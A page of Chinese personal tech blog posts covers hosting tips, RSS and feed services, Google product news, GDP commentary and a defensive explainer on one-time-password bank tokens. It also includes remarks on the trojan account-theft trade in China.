使用新的服务器有一个月时间,基本对服务器的性能和吞吐能力有了一定的了解。内存进行了扩充,原先的512M内存不够使用,新增加了512M,正好做双通道。同时在线人数最多800多,平时400多。带宽目前也还可以,没有出现限制带宽等现象。
目前的访问还正在恢复中,感觉不限制带宽真是很不错。
2013年3月12日星期二
DreamHost降低CPU Minutes的秘籍
DreamHost的CPU Minutes问题可能困扰着不少人,也有很多人为此无缘无故被DreamHost停了帐号,因此如何快捷的降低CPU Minutes已经成为使用DreamHost的一个重要的环节。经过不断的测试和调整,我发现了一条简单有效的降低DreamHost的CPU Minutes的方法,修改一个配置就可轻松降低CPU Minutes,经过我的测试,最大可以降低50%左右的CPU Minutes,效果非常明显。
具体方法是,在DreamHost的Panel控制台,选择Domains - Manage Domains,选择一个域名,编辑站点,在PHP Version这里,修改站点的PHP版本类型,将其从PHP 5.2.X修改为PHP 4.4.X,这样,网站将使用PHP4而不是PHP5,经过我的测试,使用PHP4后网站耗费的CPU将大为降低,运气好的话有可能降低50%左右的CPU资源,一举解决了CPU使用过高的问题。
为什么会是这样呢?我猜测,可能PHP5比PHP4的速度快,因此就消耗更多的CPU资源,因而使用PHP4虽然速度慢一些,但是消耗的CPU资源就减少了。
如果你的网站流量很大,消耗的CPU很多,那么不妨照此方法测试一下。
免费主页空间服务
做主页比做博客复杂一些,但灵活度就大多了,我这里介绍的大多是国外的免费主页空间,因为国外的空间虽然经常被封,但较为稳定,少有关门的,国内的则大部分都关了,而国外的Angelfire、Tripod、GeoCities等却都一直存活到现在,说明别人的赢利方式很多,经营管理不错。
下面是我认为几个不错的免费个人主页的提供商。
- geocities - http://geocities.yahoo.com
DEMO URL: http://www.geocities.com/williamlong
说明:大名鼎鼎的地球村,15MB空间,每小时限制流量4.2MB,可惜每页右边都有一个讨厌的框架广告,长期被封中。
- Tripod - http://www.tripod.lycos.com
DEMO URL: http://williamlong.tripod.com
说明:20MB空间,支持Blog和照片,每页顶部有广告。每月有流量限制。
- Angelfire - http://www.angelfire.lycos.com
DEMO URL: http://www.angelfire.com/me/williamlong
说明:20MB空间,和Tripod几乎完全一样。只有顶部有一个angelfire的广告,流量有限制。
- Freewebs - http://members.freewebs.com
DEMO URL: http://www.freewebs.com/williamlong
说明:100MB空间,每月只有500MB流量,限制可太厉害了。
- Infoseek - http://isweb.www.infoseek.co.jp
DEMO URL: http://williamlong.hp.infoseek.co.jp
说明:日本的100MB空间,好象没有流量限制。
- AOL - http://hometown.aol.com
DEMO URL: http://hometown.aol.com/williamlone
说明:12MB空间,顶部广告,可以FTP。
2013年3月10日星期日
苏州GDP超过深圳
2004年度全国城市GDP排名中,深圳市GDP总量3423亿不敌不是经济特区的苏州(3450亿),并且增速比苏州(同比增长17.6%)低0.3个百分点在全国城市排名中列第五。
苏州GDP超过深圳,的确是这样的,随着产业结构的转移,外资的不断涌入,04年苏州的GDP超过了深圳,排在上海北京广州之后,坐上第4把交椅,当地政府非常亢奋。
但是最近看报道,苏州这个国际加工基地,已经开始走下坡了,产业结构的转移,从来都是从高到低,往相对落后,工资低廉的地方转移的,从以前的香港,到马来西亚,再到珠三角,再到长三角,现在又向内地二三线的城市,甚至越南转移了,当初苏州为了要在深圳抢投资份额,当地的官老爷们甚至放弃了自己的底线,以最优惠的政策,目的是在他短暂的任期内,得到较高的GDP,什么零地价,零税收都出来了,他们可以在农民手里以低廉的价格收购土地,直接牺牲农民的利益,那些候鸟企业,就是冲着这个而来的,但是在他们即将享受完这些优惠政策的时候,他们又开始考虑迁移了,那些二三线的城市瞄准了这个时机很久了,他们甚至政府出面公关,目的就是吸引这些候鸟企业,这些企业在坐享鱼翁之利后,再也没有动力去进行技术开发,因为他们太容易得到实惠了,这是中国人强加给他们的实惠,他们拿走的是真金白银,留下的是三个英文字母--GDP,还有被污染的环境,破坏的生态,无序的市场,还有大批跟着迁移的打工一族,这就是GDP的悲哀。
深圳已经在几年前大批外资迁移长三角的时候意识到这点,在高新科技的开发和自主品牌打造方面有很大的突破,苏州虽然GDP比深圳高,但是没有自己叫的响的民族企业,GDP再高,就意味着给外国人赚走的钱越多,深圳虽然GDP没苏州高,但是它上缴的国税却比苏州高很多,这才是真金白银啊,这就是为什么深圳的人均收入是苏州的两倍多的原因。
但是苏州人似乎还没意识到这点,在一遍叫好声中迷失了自己,今年昆山又超过了广东顺德,官员们更加亢奋了,但是昆山人们的生活能跟顺德比吗?顺德区居民人均可支配收入15704.31元,最新公布的统计数据显示,至今年9月底,顺德每百户城镇居民家庭拥有32辆汽车,拥有两套住房的达41户。昆山可比吗?
大家高兴归高兴,实际归实际,实事求是,不要沉醉在GDP的数字游戏中。官员都为GDP意淫,百姓却被GDP强奸。
想起了这样一个笑话,有两个同出一门的富豪,有天打赌,甲对乙说,如果你肯吃口屎,我给你一个亿,甲马上吃了,乙也就给了一个亿,后来甲不服气,也对乙说,如果你肯吃口屎,我给你一个亿,乙刚为输了一亿而心疼,马上吃了,甲就把一个亿还给了乙,后来两人想想不对啊,他们两人的钱都没少,但是每人都吃了一口屎,想不明白,就打电话给他们的导师,他们的导师听后马上叫起来,你们真伟大啊,每人吃了一口屎,就为中国贡献了2亿的GDP。(作者不详)
赞一下深圳街区自助图书馆
今年,由深圳人自主研发的“城市街区24小时自助图书馆服务机”走进了市内多个大型社区,也包括我居住的社区,经过一些初步体验,我发现这个“自助图书馆”真是公共图书馆发展的一次重大的里程碑。我的一个朋友就称赞说,“第一次感受到了政府在公益事业上所做的贡献”。
就图书馆来说,我大学期间接触的最多,那时基本上是宿舍-教室-食堂-图书馆三点一线的活动,但是工作之后,就无法继续使用大学的图书馆了,深圳市的图书馆固然也有不少藏书,但是离我的住处较远,来回一次也要一两个小时,借一本书都非常费时费力,也让我去图书馆的兴趣大为降低。
而社区自助图书馆的出现,让我几年来第一次去了次图书馆,续办了借书证。以后再有借书要求,可以通过自助图书馆服务机来进行借还书,一台服务机大概有300-400本左右的图书,在上面还可以访问深圳图书馆网站,查询图书馆信息、馆藏状况、数据库资源等等。
不过我还是愿意在电脑上浏览深圳图书馆网站,信息是一样的,数据也是完全同步,我在自助机上借书后,网站上的图书信息会立刻更新,在自助机上没有的图书,可以在网站上提出预借请求,图书馆的工作人员将帮读者找到图书,送达读者指定的自助图书馆,通过短信通知读者,读者凭证直接到自助图书馆取书。所借的图书,可归还到任何一个自助图书馆。
不过,目前预借服务的成功率似乎不太高,我提出来三次预借申请,结果只有一次成功了,另外两次都是告诉我“亲爱的读者,因开架阅览,您预借的图书不在架上,请您预借其他图书,非常抱歉!”
虽然如此,总的来说,深圳自助图书馆对于公共图书馆的普及还是起到了重要的作用,相信越来越多的深圳市民都会享受到公共图书馆带给我们的知识大餐。
深圳图书馆借书证办理可以直接去图书馆申办,深圳图书馆位于广东省深圳市福田区福中一路,乘坐地铁到四号线少年宫站D出口,坐公交到儿童医院、市民中心或莲花山公园站即可。办理需要带上二代身份证,交押金一百元。
RSS新组合FeedBurner+Delicious+Flickr
我的Blog的RSS订阅地址将推荐使用一个新的地址。
我的Blog以前的订阅地址是:http://www.williamlong.info/rss.xml ,现在我推荐使用一个新的地址进行订阅,新的订阅地址是:http://feeds.FeedBurner.com/williamlong 。
新的RSS订阅的内容会有一些什么不同呢?最大的不同就是内容会增多。通过FeedBurner将聚合我的三个主要的RSS源(Blog的RSS+网摘的RSS+图片的RSS)。
这三个RSS,Blog的RSS就是我以前的RSS订阅地址,网摘和图片系统则有很多种不同的选择。经过一段时间的尝试和对比,我启用了FeedBurner.com+del.icio.us+Flickr.com这一套组合。
FeedBurner做为RSS订阅地址有很大的灵活性,比如地址固定,统计方便等。我最看中的一点就是FeedBurner可以合并del.icio.us和Flickr.com上的RSS,这也是我推荐订阅FeedBurner地址的最主要的原因。
至于网摘系统,我选择了Yahoo的del.icio.us。为什么不选择国内的365key呢?因为我对365key上的广告太多不很满意,其系统相对封闭,没有编程接口,另外使用上也不是很方便,而del.icio.us页面很干净,没有广告,使用也方便,提供开放的api编程接口,不过最令我欣赏的还是其“daily blog posting”功能,可以通过定时XML-RPC将每天的网摘发布到个人的Blog上。
图片共享我选择了Yahoo的Flickr,主要是其名气很大,尽管免费用户在使用上还是有很多限制,比如每月20MB上传限制,最多显示200张照片等,但其用起来还是很不错的。我很欣赏的是其邮件发布功能,可以将图片通过邮件共享发布出去,方便极了。
这一套组合看起来的确不错,不过也有一个重大风险,就是三个系统全部在国外,有可能会被电信封IP,凡是国外的好东西,电信都封的不亦乐乎,比如国外最大的域名注册商之一namecheap前一阵就被封了,为什么封?答案很简单:狗能改的了吃屎吗?
因此,我这里也推荐一套国内的组合给国内的Bloger,就是:feedsky+365key+yupoo,虽然国内的广告多点,而且可能倒闭,但不会被封IP。
月光博客RSS调整为全文输出
这些天对RSS输出做了一些调整,主要调整是将RSS输出修改为全文输出,图片链接路径进行了修改。
正如Keso所说的,RSS是一个信息聚合工具,而不仅仅是一个更新通知工具。因此如果站在读者的角度上,应该提供全文RSS阅读。
提供全文RSS输出,对于使用Bloglines或抓虾的用户来说,会使得用户阅读体验增加,不用访问Blog网站即可阅读到文章全文,但是不少程序(例如我用的Z-Blog程序)都不提供全文RSS,默认都是摘要RSS,博客托管商就更不会提供全文RSS了,因为全文RSS只会增加服务器负载,不会增加页面访问量。
对此我也有一些疑虑,全文RSS的输出大小至少100K以上,是否会对我的服务器造成大量流量负载压力,而且据说大于200K的RSS就会无法通过RSS合法性校验,这也是一个问题,不过最终我还是修改了程序的代码,提供了全文RSS输出。
全文RSS输出后,打消了我部分疑虑,Bloglines并没有对我服务器造成大量负载压力,而在Bloglines或抓虾中显示效果也非常不错,用户的阅读体验也大为增加,看来这的确很不错。
不过程序上还是出了一点小BUG,就是在Bloglines或抓虾中都无法看到文章中的图片,我仔细分析了一下代码,发现我的图片使用的是相对地址,因此Bloglines或抓虾都无法正确获取图片的地址,因此我需要修改我的图片地址,让那些系统可以正确获取到,另外也顺便解决一下图片被盗链的问题。
根据上星期的流量统计,我的Blog文章页面目录使用了1.98G的流量,而页面图片竟然使用了2.77G的流量,成为目前占用流量最多的目录。我自己也发现,不少网站转载我的文章,不但不标明出处,反而修改作者为他自己,更有甚者,盗用文章也罢,还在文章中直接盗链我文章中的图片,大量占用我服务器的流量,导致了我图片访问流量如此之大,这样的人实在缺少公德,这次我将图片的存放路径修改了,他们的盗用图片地址就会失效,这样暂时就不会再多占用我的服务器资源了,不过这也只是一个临时对策,无法根本解决盗链问题。
修改了这个BUG后,文章显示都还正常,RSS输出也正常,暂时还没发现什么其他问题,另外还在RSS输出增加了评论链接,不过这个链接只能在Bloglines中看到,抓虾里看不到,估计是抓虾的功能不强吧。
另外,根据Feedburner的统计,我目前的RSS订阅人数一共有300个,用Bloglines的有113个,占绝对优势,用Firefox Live Bookmarks有41个,GreatNews的31个。在Bloglines等在线阅读器中RSS显示都不错,但在离线阅读器如Firefox Sage和GreatNews中,使用默认的双栏格式来看会显得文字过长,最好能修改为单栏阅读方式,GreatNews的好修改,Firefox Sage的大概比较麻烦,暂时还没找到修改的地方。
抓虾的OPML频道转换到Z-Blog友情链接插件
今天写了一个抓虾的OPML频道转换到Z-Blog友情链接插件程序。
之所以想写这样的程序,因为目前的Z-Blog的友情链接管理很不方便,而且链接里没有RSS订阅地址,而且ASP下的相关资源却非常少,所以只好自己写一个了。
以前我也写了一个“ASP的Blog Roll的代码”,但是不很满意,这次的程序是在原先的那个程序基础上进行了修改,可以直接在线操作,进行OPML文件转换。
OPML文件格式我使用的是抓虾的导出OPML文件格式,在抓虾系统中选择OPML,再选择导出就可以得到OPML文件,这段代码的功能是从OPML格式的文件里提取出链接和RSS地址,然后直接按照Z-Blog的格式写到link.asp文件中,我测试了自己的OPML转换了一下,效果还不错,参见我博客首页左边的链接,目前输出方式分为HTML和JS两种方式,HTML方式是直接写到默认的友情链接文件,调用前请先备份一下以前的友情链接,否则会直接覆盖的。
插件的安装非常简单,直接将文件解压缩到PLUGIN目录下即可。
点击这里下载:抓虾的OPML频道转换到Z-Blog友情链接插件
注意,这个插件默认在Z-Blog 1.4-1.5版本下运行。由于Z-Blog 1.6目录结构发生变化,对于Z-Blog 1.6的版本需要将ASP文件开头的以下几行替换:
<!-- #include file="../../c_function.asp" -->
<!-- #include file="../../c_system_lib.asp" -->
<!-- #include file="../../c_system_base.asp" -->
修改为
<!-- #include file="../../function/c_function.asp" -->
<!-- #include file="../../function/c_system_lib.asp" -->
<!-- #include file="../../function/c_system_base.asp" -->
Feed托管服务FeedTea试用
今天收到feedtea的公关经理的邮件,邀请我试用一下FeedTea的服务,因此,我晚上就上这个网站注册试用了一下。
FeedTea是一个新的Feed托管服务,和FeedBurner以及FeedSky的用途是一样的,是一个基于.NET开发的一个Feed服务。从界面功能上看,和FeedSky的界面非常类似,熟悉FeedSky的会很容易操作。FeedTea多了一项功能是Feed合烧,也有免费的类似FeedSky的绑定域名功能,不过我还没设置成功。
使用的过程中,感觉这个Feed服务还有不少功能上的BUG,包括“使用帮助”和“关于我们”都没有内容,应该是还处于测试阶段的服务,整体上看,如果将来其各个功能都能正常稳定的运行,那也是Feed托管的一个不错的选择。
做为Feed托管服务,我觉得最重要的应该是稳定性,Feed能够稳定的发布,并且发表文章后能够及时抓取到,这样的Feed托管才有最基本的价值,这些东西都搞好之后,再开发一些有趣的扩展来在使用功能上进行拓展。
对于寄托在各个BSP上的博客作者来说,使用Feed托管可以减少博客搬家时候的损失,并且能较为简便的得到订户统计,对于流量访问上的节约,我觉得只有Feed量特别大的用户才会感觉有意义。
我目前使用的是FeedBurner的服务,当然我有点后悔一开始没有使用Feed Domain,不过总的来说FeedBurner还是比较令人满意的。如果大家一开始就使用子域名方式发布Feed,那么现在就可以自由地在FeedBurner,FeedSky,FeedTea中无缝切换且不会损失订户,那将是一个不错的选择,如果各个Feed托管服务都不满意,那么还可以绑定到自己的服务器上做为最后选择,就像我的feed.williamlong.info一样,出了没有统计功能外,显示效果也不错的,Z-Blog用户只要也使用类似我Feed中的xsl样式,也可以做到友好浏览的界面。
共享一下我的OPML订阅FEED
使用在线阅读器(例如Google Reader)阅读博客文章的人,可能都积攒了不少OPML订阅地址,但是这些订阅一般都无法和他人分享。在国外有个网站叫SHARE OPML的网站可以分享OPML订阅,可惜大部分都是英文的。对于中文用户来说一直没有什么好办法,为了更好的交流中文的OPML订阅,我现在就将我自己的Google Reader的订阅OPML文件导出并提供下载,希望能够通过这种方法和大家分享一下各自的订阅地址。
我提供的OPML文件可以直接导入到Google Reader或者Bloglines、抓虾等阅读器,按照目录进行了分类,订阅内容绝大部分都是全文RSS输出的,几乎没有摘要RSS输出,总共150多个,每天的更新量大约100-300篇,中英文都按目录分开,下面我就将我分类的各个目录的含义稍稍解释说明一下。
internet目录,大部分是IT业界和互联网资讯信息,除了2个是繁体中文的外,其余都是简体中文,只有一个摘要RSS输出,其他全部都是全文RSS输出。
reference目录,英文的IT业界资讯和部门公司的官方Blog,都是英文Blog的。注意,其中某几个Feed(例如TechCrunch、Techmeme、Lifehacker)的更新频率非常快,可能会导致内容更新过多,受不了的可以将其删除。
blog目录,英文的博客写作技巧和经验的Blog,介绍写作经验、SEO、博客广告营销。
earth目录,英文的Google Earth相关的Blog。
google目录,Google的多个产品的官方Blog,全都是英文。
search目录,国内的搜索引擎相关企业的官方博客,全部是中文。
culture目录,人文、艺术、文化方面的博客。
life目录,生活、游戏、美食、娱乐方面的博客。
finance目录,财经、股票方面的博客。
society目录,媒体、思考、时事、新闻方面的博客。
对于某些更新量特别大,但是内容还不错的RSS,我不建议将其放在Google Reader中阅读,那样的阅读效率反而会更低,大家可以直接去其网站阅读,可能阅读效果会更好。我这里介绍几个比较好的IT业界和互联网方面的网站:
cnbeta、Donews、TechWeb、新浪科技、网易科技、搜狐IT、百度互联网新闻、谷歌科技资讯(百度和谷歌的新闻都是机器生成的,前面的都是人工编辑的)。
我共享的OPML订阅文件点这里下载,大小30K,下载后可以直接在阅读器中导入。
注1:导入前请务必备份好你原有的OPML文件。
注2:我的OPML文件将每月进行更新,最新的OPML文件会同步上传到这里。
Feed的订阅数超过了五万
昨天,月光博客的RSS Feed订阅用户超过了五万,达到了50363,一个半月前,我的Feed订阅数刚刚超过四万,现在又超过了五万,三个月的时间,订阅用户增加了两万。
相对增长的数字其实更有意义,和前两次的数据相比较,我这里做了一个对应表格,可以直观的看出目前主流RSS在线阅读器上订阅我博客的分布情况。
| 在线订阅器 | 2月15日 | 3月28日 | 5月15日 | 增加数 |
| 15767 | 21338 | 26897 | 5559 | |
| xianguo | 6366 | 9048 | 12900 | 3852 |
| Zhuaxia | 5840 | 6213 | 6588 | 373 |
| Douban | 1039 | 1074 | 1106 | 32 |
| YoDao.com | 0 | 669 | 740 | 71 |
| Bloglines | 257 | 273 | 291 | 18 |
| NewsGatorOnline | 67 | 67 | 221 | 154 |
| SendMeRss.com | 35 | 40 | 26 | -14 |
| Netvibes | 28 | 35 | 38 | 3 |
从这个表格我们可以看到,阅读器市场已经有明显两极分化的趋势,主流RSS阅读器和非主流RSS阅读器用户增加量相差巨大,其中Google的用户增加量依然最多。
我的RSS订阅用户的增长也呈现出稳定的规律,即每一个半月增长一万用户。
因为我目前使用FeedSky的服务托管我的feed.williamlong.info,而我最开始使用的是FeedBurner的服务,我的FeedBurner用户已经没有增长了,一直是1万1千左右,其中Google的订阅数就占8457,Bloglines为898,Yodao为371。FeedBurner虽然被和谐,但是目前各个主要的阅读器都可以读取FeedBurner的内容,这部分订阅用户实际还没有损失。
根据FeedSky的统计,目前也有部分用户使用离线阅读器订阅我的RSS Feed,不过订阅数加起来总共只有1千多,和庞大的在线阅读器用户相比几乎可以忽略不计。
当然,目前的在线阅读器用户数目并不准确,因为各个阅读器只是输出总用户订阅数,实际上有很多“休眠”用户也统计在里面,更为准确的统计方法为输出“活跃用户数”,也就是至少一个星期登录过一次的用户,这样的数据才准确。
Google中国地图新增实时交通流量信息
中国版的谷歌地图已经悄然更新了北京和上海的地图,新增加城市公路的实时交通信息,使用户在制订驾车路线时做到心中有数。
目前,在中国开通实时交通流量的Google地图城市只有北京和上海,Google的交通流量信息服务为主要的城市公路提供交通状况信息:绿色表明不堵塞;黄色表示有轻微的拥挤;而红色表明道路相当堵塞。
据Google产品经理介绍,这些交通数据信息来自几个途径,包括道路监控头,汽车和出租车的反馈信息。因此,有时会出现信息数据不够的情况。
Google暂时只为城市主要的公路提供路况信息,但最终可能会将这项服务扩展至全部的道路。之后,这项功能还可能会扩展到中国其他主要大城市。这样,驾车用户在出行的时候就更方便了,比起交通电台来说,Google地图的交通流行信息更为直观和清晰。
Google街景车在台湾香港出现
据世纪奥美公关报道,Google街景车12月起开始在台湾进行街景信息收集,民众将会看到顶端设有专属相机、车身有Google logo的Google街景车穿梭于台湾各地的街道,拍摄各地的地标、建筑物和公共道路。待照片资料收集完成后,Google将发展成为街景服务功能(Street View),预计于2009年在台湾正式上线。
与此同时,Google街景车也开始在香港行动了。很多香港居民都在街上发现Google街景车的活动,看来台湾、香港、澳门的Google街景服务功能即将在不久的将来全面启动。
街景服务是Google 地图服务中的一项功能,用户可以360度转动来浏览街景,不仅如此,还可以放大、缩小,或者用鼠标拖曳画面来旋转角度,甚至可以向上向下浏览街景。待台湾街景服务功能上线后,用户将能透过此360度浏览街景的网络服务,得到更详尽且真实的地图信息。
2013年3月8日星期五
中国是网络木马病毒犯罪的天堂
看到一条新闻《刑法修正后首例木马案公诉:3个月牟利3000万》,感慨万千,我以前就曾经提到过黑客产业链的问题,没想到现在竟然发展到这么大的规模。
据新闻报道,这起案件的犯罪嫌疑人是个只有初中学历的无业青年,他发现QQ以及游戏的盗号木马病毒很好销售,如果能找个人根据不同的游戏制作不同的盗号木马,并且能根据杀毒软件不断升级的话,能赚很多钱,于是就以每月2000元的薪酬聘请了一个程序员其编写盗号木马程序。该程序员通过自学成为编程高手,但由于学历不过硬,因此在求职时屡屡碰壁,于是就开始专门编写盗号木马程序,盗取QQ和网络游戏的帐号。犯罪嫌疑人在被起诉后坦白,他制作的木马3个月挣来了3000万。
这类案件给人的启示就是,在中国进行网络犯罪的成本太低了,收益却太高了。马克思说过,“有百分之五十的利润,资本就铤而走险,为了百分之百的利润,它就敢践踏人间一切的法律,有百分之三百的利润,它就敢犯任何罪行,甚至冒着绞首的危险”。花几千块钱雇佣一个程序员做木马病毒,三个月就可以挣来了3000万,如果而这种网络犯罪行为没有得到官方的重视和重点打击,那这样的网络犯罪不猖狂不飞速发展才叫奇怪呢。所以导致的必然现象就是,这些年这种黑客事业在中国超高速发展,却没人管,现在的中国俨然已经成为网络木马病毒犯罪的天堂。
木马病毒的飞速发展主要由中国的目前国情所导致:
1、网民年轻化——中国的网民非常年轻,特别是QQ和网络游戏的用户都是年轻人,他们喜欢玩游戏,但电脑水平通常都较低,无法应付基本的网络木马病毒,很容易中招。
2、极高的利润——由于中国的网民飞速发展,网络游戏和QQ的用户基数非常大,因此大量的盗号会带来极高的利润率,上面的案件中三个月的利润就达到3000万。
3、法律上的缺陷——由于这一类案件受害人不确定,大多数人虚拟财产遭窃后,都会自认倒霉,大都不会选择报警,难以获取证据,在法律上也没有较好的适用刑法,因此导致罪犯即使被抓获,量刑和定罪都不重。
4、官方打击不力——警员的数量是有限的,大部分网络警察的主要工作是控制网络低俗信息和有害信息,并通过备案这种形式来加强控制,根本无暇处理大量的网络犯罪行为,从客观上讲是放任网络犯罪的进一步泛滥。上例案件仅仅是抓了一个典型而已,大量的漏网之鱼都逃脱的法律的制裁。
因此,上面这些因素就导致了当前中国网络木马病毒的泛滥,这些黑客已经形成了一套完整的产业链,集团化、专业化趋势越来越明显,有上线专门负责盗取,有负责网络汇总,有下线负责网上销赃,还有专门负责培训入门黑客技术的,规模越来越庞大。我们的政府如果再听之任之,继续放任这种情况发展下去的话,后果将不堪设想。亡羊补牢,为时不晚,现在该是某些行政机关做一些实际事情的时候了。
中国网银安全分析:动态密码锁
前文已经提出了一个安全网上银行系统的大致描述,今天我们将论述一下如何构造这种安全的网银系统。
要想知道什么样的网银系统是安全的,首先要知道哪些网银系统是不安全的。
我的观点是,所有不带有身份认证令牌硬件设备的网银系统都是不安全的。
这些系统包括各种“大众版”网银,以及一些所谓的数字证书“专业版”,因为他们从本质上来讲,所有的运行代码都是在电脑内存中运行的,用户所有的操作都有可能被木马所截获。理论上讲,黑客完全可以伪造用户进行系统登录。只有脱离用户的电脑系统,使用独立的身份认证硬件设备,才能构造出安全的网银系统。
目前有两种流行的身份认证硬件产品可以实现较为安全的网银系统登录。
第一种身份认证产品名叫“动态密码锁”。
动态密码(Dynamic Password)也称一次性密码,它指用户的密码按照时间或使用次数不断动态变化,每个密码只使用一次。动态密码采用一种称之为动态令牌的专用硬件,内置电源、密码生成芯片和显示屏。下图是这种产品的外观,其中数字键用于输入用户PIN码,显示屏用于显示一次性密码。每次输入正确的PIN码,都可以得到一个当前可用的一次性动态密码。
这种产品的密码生成芯片运行专门的密码算法,根据当前时间以及使用次数生成当前密码并显示在显示屏上。认证服务器采用相同的算法计算当前的有效密码。由于每次使用的密码必须由动态令牌来产生,只有合法用户才持有该硬件,所以只要密码验证通过,系统就可以认为该用户的身份是可靠的。而用户每次使用的密码都不相同,即使黑客截获了一次密码,也无法利用这个密码来仿冒合法用户的身份,因为下一次登录必须使用另外一个动态密码。
动态密码锁系统需要两个密码要素,一个要素是静态PIN码,由用户自行设置、保管。另一个要素是动态密码,由密码令牌动态生成,不可预测,并且与后台服务器的接入控制保持同步,由后台服务器进行检验。因此,用户必需输入正确的静态PIN码和动态密码,才能通过身份认证。
动态密码锁本身需要输入PIN码才能使用,静态PIN码的安全要素在于,这个PIN码不是在电脑上输入的,而是在密码锁上输入的,这样,所有的黑客木马程序从理论上讲都全部失效,因为这些木马根本不可能在另外一个硬件密码锁上运行。
黑客要想破解用户密码,首先要从物理上获得用户的动态密码锁,其次还要获得用户的PIN码,这样,黑客必须潜入用户家中(电脑黑客还需要学习普通窃贼的技术),偷取了动态密码锁,然后再破解PIN码。没有用户PIN码依旧无法使用,而通常情况下动态密码锁本身具有一定安全保护功能,录入PIN码错误10次就会自动锁死而无法使用。这也保证了动态密码锁物理上的安全性。
动态密码技术可以完美解决客户端用户的安全性问题,因为黑客无论使用什么方法,也无法方便的窃取用户的密码,即使黑客窃取了一次密码也无法登录使用。
从技术上将,动态密码技术是比较完美的方案,然而可惜的是,动态密码锁的成本过高,大部分成本都高于100元,不太利于大规模使用。中国目前有一些银行图便宜,使用一种文字卡片类型的所谓的“动态密码卡”,也是用来实现较为原始的动态密码技术。实际上,这种低成本的卡片具有的缺陷是非常明显的,卡片内容极易被复制,且没有保护PIN码,别人偷盗或者复制这张卡片即可冒名登录,其安全性远不及真正的动态密码锁身份认证系统。
虽然动态密码锁的安全性的确不错,然而,动态密码技术也有一个安全隐患,就是服务器端的安全性。动态密码的本质是单钥加密,密钥只有一个。在服务器端的认证系统里,可以计算出所有动态密码,因此黑客如果将精力放在破解银行认证服务器系统,那么还是有可能对银行系统造成一定安全威胁,另外这个系统也依赖于网银的管理员,网银的管理员可以在服务器端修改动态密码锁的规则,也具有一定的安全隐患。
下一回,我们将介绍另外一种低成本的身份认证硬件产品,可以通过双钥加密的技术实现安全的认证,并可以弥补动态密码锁的某些安全性的隐患。
常用网站开发类Firefox扩展插件
作为一个 Web 开发人员,你几乎没有理由不喜欢Firefox,因为在Firefox下有很多专门针对开发的扩展插件,非常好用,这里就介绍一些常用的针对网站开发的FireFox扩展,供Web开发人员参考。
1、Firebug
用于调试JavaScript,修改界面HTML和CSS,一些常用的网络分析扩展也是基于Firebug的,非常好用。
2、YSlow
YSlow是Yahoo开发的,基于Firebug的用于分析网页性能的工具,可以提供如何提高网站性能的一套规则,用于优化网页的速度和建立高性能的网页。
Page Speed是Google开发的类似YSlow的工具,也是基于Firebug插件,网站管理员和网络开发人员可以使用 Page Speed 来评估他们网页的性能,并获得有关如何改进性能的建议。
Web Developer是集成了一系列Web开发工具,例如HTML、CSS校验、FORM修改等功能,拥有强大的CSS调试和Form调试能力,对页面的分析非常全面,可以禁止页面的任一内联、文档、和外部CSS,可以直接编辑当前CSS。
浏览页面同时记录所有HTTP headers,可分析各个http头的状态码。
6、HttpFox
监控和记录所有HTTP访问中发送和接受的数据,包括URL地址、HTTP头、传输参数等信息。
浏览器切换器,可以让Firefox伪装为其他浏览器,伪装其他浏览器例如iPhone来访问网站。当初我提前体验Google Buzz就是利用这个扩展模拟iPhone登录来实现的。
基于IETab开发的增强版本,在Firefox中模拟使用IE浏览器的引擎来访问网页。
可以测量页面上任何选择区域的长宽。
10、ColorZilla
可以从页面,或者调色板上取色,同时可以缩放页面。
11、FireFTP
在Firefox中实现FTP的功能。
12、Greasemonkey
让你可以使用JavaScript在浏览器上实现一些特殊的定制功能,有上百个基于Greasemonkey的JavaScript代码可供使用。
改善Firefox浏览器显示源代码的样式。
14、HTML Validator (based on CSE HTML Validator)
使用CSE的HTML验证引擎,需要安装CSE HTML Validator for Windows,有lite版本。
15、wmlbrowser
模拟WAP访问WML (Wireless Markup Language)网页。
2013年3月6日星期三
对于月光博客版权信息的重申
据热心读者lifengning666666向我举报,辽宁《网络与信息》杂志在是2008年02期的两篇文章《十大免费软件替换盗版软件》和《十个装机必备的免费软件》为剽窃抄袭我博客的同名文章。
经过我和辽宁《网络与信息》杂志社的交涉,该杂志已经承认了错误,将在第4期杂志上发表声明,注明我的版权,同时将不支付剽窃者稿费。
在此我再次重申一下月光博客的版权协议。月光博客属于署名-非商业性使用-相同方式共享的知识共享协议的许可协议,尽管CC协议对于知识创作的共享大于保护,而且我并不反对关于我的创作和知识的传播,但是传播的时候需要遵守网络分享的底线,分享知识创作必须署上作者名字(月光博客)和原始出处(原文链接地址),不能用于商业用途,同时你的博客必须也使用CC协议。而将我的博客文章署上你自己的大名,然后投稿到平面媒体杂志上赚取稿费,这就完全不符合创作共用协议了,这么做完全是为了赚钱而不是为了分享,任何博客作者都不会容忍这种剽窃行为的。
对于类似的剽窃者,我想告诉他们,若要人不知,除非己莫为,做这种事情,你们将会一无所获,同时我也鼓励月光博客的读者积极举报那些剽窃者,特别是平面媒体的剽窃者,通过我们的共同努力来抵制这种不尊重创作版权的不正之风。
Google Sky中文Web浏览器版发布
据Google LatLong官方博客报道,Google在推出了Google火星、Google月球和下载版的Google Sky之后,为了让Web浏览器用户也能体会到Google Sky的精彩,Google宣布推出了Web版的Google Sky(谷歌天空),让浏览器用户也能够体味到宇宙探索的乐趣。
Web浏览器版的Google Sky支持包括简体中文在内的26种语言,他把用户的浏览器变成了一台虚拟望远镜,可以放大和浏览整个宇宙天体,你可以通过以下方法轻松探索宇宙:
1、通过内置的强大搜索功能寻找成千上万的天体名称。
2、通过肉眼看到一个真正的变焦镜头,你可以尝试在红外线、微波、紫外线和X光下欣赏不同的天空景色,还可以混合观看独特的视觉效果。
3、观看哈勃和其他许多望远镜上拍摄的著名宇宙天体照片。
4、目前地球的位置和星座。
5、自定义KML内容。(可以采用类似Google Maps的方法,简单地粘贴Google Sky的KML地址到搜索框)
所有这一切都可以在任何网络浏览器、任何操作系统上执行,而不需要额外的下载文件,Google Sky在全世界范围内支持26种本地化语言,包括简体中文在内。
Google Sky Web版的访问地址是:sky.google.com
请小心Picasa和Firefox的下载站
由于一些网络界的害群之马的所谓“成功网赚经验”,已经让本来好好的Firefox推介和Picasa推介价格降低,之后被迫停止了,但是,即使Picasa和Firefox的推介已经没有广告显示,国内那些搞点击欺诈的网站还是会对那些专门优化了的引导站进行“废物利用”——直接让用户下载木马病毒。
